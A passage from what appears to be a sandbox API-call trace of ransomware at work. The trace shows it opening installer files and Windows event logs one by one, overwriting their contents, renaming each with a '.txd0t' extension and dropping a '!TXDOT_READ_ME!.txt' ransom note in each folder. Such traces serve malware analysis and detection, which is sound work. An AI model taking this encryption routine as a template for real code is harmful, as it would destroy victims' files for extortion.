"c:\\588bce7c90097ed212\\3082\\eula.rtf.txd0t")) returned 1 [0086.841] SetEvent (hEvent=0x404) returned 1 [0086.845] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0086.845] StrCpyW (in: psz1=0x414f6b0, psz2="\\\\?\\C:\\588bce7c90097ed212\\DHtmlHeader.html" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\DHtmlHeader.html") returned="\\\\?\\C:\\588bce7c90097ed212\\DHtmlHeader.html" [0086.845] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\DHtmlHeader.html", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\DHtmlHeader.html.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\DHtmlHeader.html.txd0t" [0086.845] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\DHtmlHeader.html.txd0t") returned 0 [0086.846] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\DHtmlHeader.html", dwFileAttributes=0x80) returned 1 [0086.846] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\DHtmlHeader.html" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x478 [0086.846] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=16118) returned 1 [0086.846] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.846] WriteFile (in: hFile=0x478, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0086.864] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xffffbf0a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.864] ReadFile (in: hFile=0x478, lpBuffer=0x380d020, nNumberOfBytesToRead=0x3ef0, lpNumberOfBytesRead=0x414f670, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f670*=0x3ef0, lpOverlapped=0x0) returned 1 [0086.869] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xffffc110, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.869] WriteFile (in: hFile=0x478, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x3ef0, lpNumberOfBytesWritten=0x414f674, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f674*=0x3ef0, lpOverlapped=0x0) returned 1 [0086.874] FlushFileBuffers (hFile=0x478) returned 1 [0086.956] GetProcessHeap () returned 0xe30000 [0086.956] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xfc) returned 0xecfde0 [0086.956] StrCpyW (in: psz1=0xecfde0, psz2="\\\\?\\C:\\588bce7c90097ed212\\DHtmlHeader.html" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\DHtmlHeader.html") returned="\\\\?\\C:\\588bce7c90097ed212\\DHtmlHeader.html" [0086.956] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\DHtmlHeader.html") returned="DHtmlHeader.html" [0086.956] StrCpyW (in: psz1=0xecfe14, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0086.956] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\!TXDOT_READ_ME!.txt") returned 0 [0086.956] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\!TXDOT_READ_ME!.txt" (normalized: "c:\\588bce7c90097ed212\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x47c [0086.957] WriteFile (in: hFile=0x47c, lpBuffer=0x414f6a4*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x414f6a0, lpOverlapped=0x0 | out: lpBuffer=0x414f6a4*, lpNumberOfBytesWritten=0x414f6a0*=0x2, lpOverlapped=0x0) returned 1 [0086.958] FlushFileBuffers (hFile=0x47c) returned 1 [0086.961] WriteFile (in: hFile=0x47c, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x414f6a0, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x414f6a0*=0x7f0, lpOverlapped=0x0) returned 1 [0086.961] FlushFileBuffers (hFile=0x47c) returned 1 [0086.964] CloseHandle (hObject=0x47c) returned 1 [0086.964] GetProcessHeap () returned 0xe30000 [0086.964] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecfde0 | out: hHeap=0xe30000) returned 1 [0086.964] CloseHandle (hObject=0x478) returned 1 [0086.964] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\DHtmlHeader.html" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\DHtmlHeader.html.txd0t" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html.txd0t")) returned 1 [0086.965] SetEvent (hEvent=0x404) returned 1 [0086.965] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0086.972] StrCpyW (in: psz1=0x414f6b0, psz2="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core.mzz" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core.mzz") returned="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core.mzz" [0086.972] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core.mzz", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core.mzz.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core.mzz.txd0t" [0086.972] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core.mzz.txd0t") returned 0 [0086.972] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core.mzz", dwFileAttributes=0x80) returned 1 [0086.974] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x478 [0086.974] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=181483595) returned 1 [0086.974] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.974] WriteFile (in: hFile=0x478, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0086.978] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xf52ec5b5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.979] ReadFile (in: hFile=0x478, lpBuffer=0x380d020, nNumberOfBytesToRead=0x200000, lpNumberOfBytesRead=0x414f670, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f670*=0x200000, lpOverlapped=0x0) returned 1 [0087.360] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xffe00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.360] WriteFile (in: hFile=0x478, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x200000, lpNumberOfBytesWritten=0x414f674, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f674*=0x200000, lpOverlapped=0x0) returned 1 [0087.368] FlushFileBuffers (hFile=0x478) returned 1 [0087.618] GetProcessHeap () returned 0xe30000 [0087.618] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xf8) returned 0xe9d750 [0087.618] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core.mzz" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core.mzz") returned="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core.mzz" [0087.618] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core.mzz") returned="netfx_Core.mzz" [0087.618] StrCpyW (in: psz1=0xe9d784, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0087.618] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\!TXDOT_READ_ME!.txt") returned 1 [0087.619] GetProcessHeap () returned 0xe30000 [0087.619] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0087.619] CloseHandle (hObject=0x478) returned 1 [0087.619] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core.mzz.txd0t" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz.txd0t")) returned 1 [0087.619] SetEvent (hEvent=0x404) returned 1 [0087.619] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0087.620] StrCpyW (in: psz1=0x414f6a0, psz2="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x86.msi" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x86.msi" [0087.620] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x86.msi", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x86.msi.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x86.msi.txd0t" [0087.620] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x86.msi.txd0t") returned 0 [0087.621] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x86.msi", dwFileAttributes=0x80) returned 1 [0087.621] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x478 [0087.621] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=495616) returned 1 [0087.621] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.621] WriteFile (in: hFile=0x478, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0087.622] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfff86e00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.622] ReadFile (in: hFile=0x478, lpBuffer=0x380d020, nNumberOfBytesToRead=0x79000, lpNumberOfBytesRead=0x414f660, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f660*=0x79000, lpOverlapped=0x0) returned 1 [0087.633] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfff87000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.633] WriteFile (in: hFile=0x478, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x79000, lpNumberOfBytesWritten=0x414f664, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f664*=0x79000, lpOverlapped=0x0) returned 1 [0087.634] FlushFileBuffers (hFile=0x478) returned 1 [0087.717] GetProcessHeap () returned 0xe30000 [0087.717] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x108) returned 0xe9d750 [0087.717] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x86.msi" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x86.msi" [0087.717] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned="netfx_Extended_x86.msi" [0087.717] StrCpyW (in: psz1=0xe9d784, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0087.717] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\!TXDOT_READ_ME!.txt") returned 1 [0087.718] GetProcessHeap () returned 0xe30000 [0087.718] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0087.718] CloseHandle (hObject=0x478) returned 1 [0087.718] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x86.msi"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x86.msi.txd0t" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x86.msi.txd0t")) returned 1 [0087.719] SetEvent (hEvent=0x404) returned 1 [0087.719] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0087.721] StrCpyW (in: psz1=0x414f6c0, psz2="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.xsd" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.xsd") returned="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.xsd" [0087.721] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.xsd", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.xsd.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.xsd.txd0t" [0087.721] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.xsd.txd0t") returned 0 [0087.722] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.xsd", dwFileAttributes=0x80) returned 1 [0087.722] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.xsd" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x478 [0087.722] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=30120) returned 1 [0087.722] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.722] WriteFile (in: hFile=0x478, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0087.725] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xffff8858, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.725] ReadFile (in: hFile=0x478, lpBuffer=0x380d020, nNumberOfBytesToRead=0x75a0, lpNumberOfBytesRead=0x414f680, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f680*=0x75a0, lpOverlapped=0x0) returned 1 [0087.729] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xffff8a60, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.729] WriteFile (in: hFile=0x478, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x75a0, lpNumberOfBytesWritten=0x414f684, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f684*=0x75a0, lpOverlapped=0x0) returned 1 [0087.729] FlushFileBuffers (hFile=0x478) returned 1 [0087.742] GetProcessHeap () returned 0xe30000 [0087.742] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xf2) returned 0xe9d750 [0087.742] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.xsd" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.xsd") returned="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.xsd" [0087.742] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.xsd") returned="SetupUi.xsd" [0087.742] StrCpyW (in: psz1=0xe9d784, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0087.742] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\!TXDOT_READ_ME!.txt") returned 1 [0087.742] GetProcessHeap () returned 0xe30000 [0087.742] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0087.743] CloseHandle (hObject=0x478) returned 1 [0087.743] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.xsd" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.xsd.txd0t" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd.txd0t")) returned 1 [0087.743] SetEvent (hEvent=0x404) returned 1 [0087.743] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0087.745] StrCpyW (in: psz1=0x414f6c0, psz2="\\\\?\\C:\\588bce7c90097ed212\\UiInfo.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\UiInfo.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\UiInfo.xml" [0087.745] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\UiInfo.xml", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\UiInfo.xml.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\UiInfo.xml.txd0t" [0087.745] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\UiInfo.xml.txd0t") returned 0 [0087.745] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\UiInfo.xml", dwFileAttributes=0x80) returned 1 [0087.745] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x478 [0087.745] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=38898) returned 1 [0087.745] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.745] WriteFile (in: hFile=0x478, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0087.748] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xffff660e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.749] ReadFile (in: hFile=0x478, lpBuffer=0x380d020, nNumberOfBytesToRead=0x97f0, lpNumberOfBytesRead=0x414f680, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f680*=0x97f0, lpOverlapped=0x0) returned 1 [0087.750] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xffff6810, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.750] WriteFile (in: hFile=0x478, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x97f0, lpNumberOfBytesWritten=0x414f684, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f684*=0x97f0, lpOverlapped=0x0) returned 1 [0087.751] FlushFileBuffers (hFile=0x478) returned 1 [0087.785] GetProcessHeap () returned 0xe30000 [0087.785] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xf0) returned 0xe9d1f8 [0087.785] StrCpyW (in: psz1=0xe9d1f8, psz2="\\\\?\\C:\\588bce7c90097ed212\\UiInfo.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\UiInfo.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\UiInfo.xml" [0087.785] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\UiInfo.xml") returned="UiInfo.xml" [0087.785] StrCpyW (in: psz1=0xe9d22c, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0087.785] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\!TXDOT_READ_ME!.txt") returned 1 [0087.785] GetProcessHeap () returned 0xe30000 [0087.785] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d1f8 | out: hHeap=0xe30000) returned 1 [0087.785] CloseHandle (hObject=0x478) returned 1 [0087.785] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\UiInfo.xml.txd0t" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml.txd0t")) returned 1 [0087.786] SetEvent (hEvent=0x404) returned 1 [0087.786] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0087.787] StrCpyW (in: psz1=0x414f6d0, psz2="\\\\?\\C:\\Logs\\HardwareEvents.evtx" | out: psz1="\\\\?\\C:\\Logs\\HardwareEvents.evtx") returned="\\\\?\\C:\\Logs\\HardwareEvents.evtx" [0087.787] StrCatW (in: psz1="\\\\?\\C:\\Logs\\HardwareEvents.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\HardwareEvents.evtx.txd0t") returned="\\\\?\\C:\\Logs\\HardwareEvents.evtx.txd0t" [0087.787] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\HardwareEvents.evtx.txd0t") returned 0 [0087.787] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\HardwareEvents.evtx", dwFileAttributes=0x80) returned 1 [0087.788] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\HardwareEvents.evtx" (normalized: "c:\\logs\\hardwareevents.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x478 [0087.788] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=69632) returned 1 [0087.788] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.788] WriteFile (in: hFile=0x478, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0087.789] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.789] ReadFile (in: hFile=0x478, lpBuffer=0x380d020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x414f690, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f690*=0x11000, lpOverlapped=0x0) returned 1 [0087.793] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.793] WriteFile (in: hFile=0x478, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x414f694, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f694*=0x11000, lpOverlapped=0x0) returned 1 [0087.793] FlushFileBuffers (hFile=0x478) returned 1 [0087.801] GetProcessHeap () returned 0xe30000 [0087.801] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xe6) returned 0xe3f8d0 [0087.801] StrCpyW (in: psz1=0xe3f8d0, psz2="\\\\?\\C:\\Logs\\HardwareEvents.evtx" | out: psz1="\\\\?\\C:\\Logs\\HardwareEvents.evtx") returned="\\\\?\\C:\\Logs\\HardwareEvents.evtx" [0087.801] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\HardwareEvents.evtx") returned="HardwareEvents.evtx" [0087.801] StrCpyW (in: psz1=0xe3f8e8, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0087.801] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 0 [0087.801] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt" (normalized: "c:\\logs\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x46c [0087.806] WriteFile (in: hFile=0x46c, lpBuffer=0x414f6c4*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x414f6c0, lpOverlapped=0x0 | out: lpBuffer=0x414f6c4*, lpNumberOfBytesWritten=0x414f6c0*=0x2, lpOverlapped=0x0) returned 1 [0087.806] FlushFileBuffers (hFile=0x46c) returned 1 [0087.809] WriteFile (in: hFile=0x46c, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x414f6c0, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x414f6c0*=0x7f0, lpOverlapped=0x0) returned 1 [0087.810] FlushFileBuffers (hFile=0x46c) returned 1 [0087.811] CloseHandle (hObject=0x46c) returned 1 [0087.811] GetProcessHeap () returned 0xe30000 [0087.811] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe3f8d0 | out: hHeap=0xe30000) returned 1 [0087.811] CloseHandle (hObject=0x478) returned 1 [0087.811] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\HardwareEvents.evtx" (normalized: "c:\\logs\\hardwareevents.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\HardwareEvents.evtx.txd0t" (normalized: "c:\\logs\\hardwareevents.evtx.txd0t")) returned 1 [0087.811] SetEvent (hEvent=0x404) returned 1 [0087.811] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0087.812] StrCpyW (in: psz1=0x414f6c0, psz2="\\\\?\\C:\\Logs\\Key Management Service.evtx" | out: psz1="\\\\?\\C:\\Logs\\Key Management Service.evtx") returned="\\\\?\\C:\\Logs\\Key Management Service.evtx" [0087.813] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Key Management Service.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Key Management Service.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Key Management Service.evtx.txd0t" [0087.813] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Key Management Service.evtx.txd0t") returned 0 [0087.813] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Key Management Service.evtx", 